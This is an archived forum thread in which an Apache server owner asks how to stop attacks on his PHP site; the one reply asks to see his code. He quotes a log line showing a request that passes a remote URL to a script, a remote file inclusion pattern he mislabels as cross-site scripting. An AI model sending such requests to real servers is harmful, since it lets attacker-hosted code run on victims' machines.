mysteron Posted July 3, 2007 Share Posted July 3, 2007 Hi. I need some help regarding my Apache webserver (2.0.52) that is being abused by spammers. It seems that they are doing cross-site scripting attacks through my webserver, and I need help with stopping it. I installed ModSecurity2 for Apache hoping that it would disable the attacks. The style of the attacks are for example: x.x.x.x - - [01/Jul/2007:21:31:23 +0300] "GET /index2.php?selection=http://x.x.x.x/modules/php.txt? HTTP/1.1" etc... What do I have to do in order to completely disabling this possibility? Is it this option that should be set to 'Off' : allow_url_fopen = On in php.ini? Feedback will be greatly appreciated Thx, /mysteron Link to comment https://forums.phpfreaks.com/topic/58185-help-with-php-abused-webserver/ Share on other sites More sharing options...
Daniel0 Posted July 3, 2007 Share Posted July 3, 2007 We'd probably have to see your code in order to improve it. Link to comment https://forums.phpfreaks.com/topic/58185-help-with-php-abused-webserver/#findComment-288579 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.